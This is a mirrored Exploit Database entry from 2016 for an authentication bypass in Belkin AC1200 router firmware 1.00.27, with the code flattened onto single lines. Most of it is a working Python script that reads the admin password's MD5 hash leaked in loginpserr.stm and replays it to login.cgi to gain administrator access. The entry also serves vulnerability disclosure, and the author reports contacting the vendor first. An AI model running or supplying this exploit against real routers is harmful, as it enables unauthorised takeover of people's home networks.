Belkin AC1200 Router Firmware 1.00.27 – Authentication Bypass

• Exploit Database
• 110 阅读

• 作者： Gregory Smiley
  日期： 2016-07-11
• 类别：

  • webapps
  平台：

  • cgi
• 来源：https://www.exploit-db.com/exploits/40081/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145

  ''' # Exploit Title: Belkin Router AC1200, Firmware: 1.00.27 - Authentication Bypass # Date: 5/11/2016 # Exploit Author: Gregory Smiley # Contact: gsx0r.sec@gmail.com # Vendor Homepage: http://www.belkin.com # Version: Firmware: 1.00.27 # Tested on:F9K1113 v1     #1. Description:   #The Belkin AC1200 is vulnerable to authentication bypass due to it performing client side #authentication after you attempt to login after already having failed a login. That webpage, loginpserr.stm contains the md5 hash value of the administrators password. This can be #exploited by extracting that hash value, and passing it in the pws field in a post request to #login.cgi.   #I would like to note that I contacted Belkin on several occasions #and gave them plenty of time to reply/fix the issue before releasing this entry.       #2. Proof:   #Line 55 of loginpserr.stm contains the javascript code:   #var password = "md5hashofpassword";     #3. Exploit: '''   #!/usr/bin/python     import urllib   import urllib2   import sys     router = raw_input('Enter IP address of your AC1200 to test: ')   page = urllib2.urlopen('http://'+router+'/loginpserr.stm').read()   test_page = page     vuln_string = 'var password = "'   if vuln_string in test_page:   print 'Router is vulnerable.' answer = raw_input('Would you like to exploit the target? Y/N : ')     else:     print 'Router is not vulnerable.' print 'exiting...'   sys.exit()     if (answer == 'y') or (answer == 'Y'):     extract = test_page.split(vuln_string, 1)[1] #These two lines extract the leaked hash value _hash = extract.partition('"')[0] #from /loginpserr.stm using quotes as a delimiter     else:     if (answer == 'n') or (answer == 'N'): print 'exiting...'   sys.exit()     #Assemble the POST request to /login.cgi       headers = {     'Host': router,   'Connection': 'keep-alive',   'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0',   'Accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',   'Accept-Language' : 'en-US,en;q=0.5',   'Accept-Encoding' : 'gzip, deflate',   'Referer' : 'http://'+router+'/',   'Connection': 'keep-alive',   'Content-Type': 'application/x-www-form-urlencoded'   }     data = {       'totalMSec':'0',   'pws': _hash,   'url':'status.stm',   'arc_action':'login',   'pws_temp': ''   }     data = urllib.urlencode(data)     #Sends the POST request with the hash in the pws field     req = urllib2.Request('http://'+router+'/login.cgi', data, headers)     response = urllib2.urlopen(req)   the_page = response.read()     print 'Exploit successful.'   print 'You are now free to navigate to http://'+router+'/ ...as admin ;)'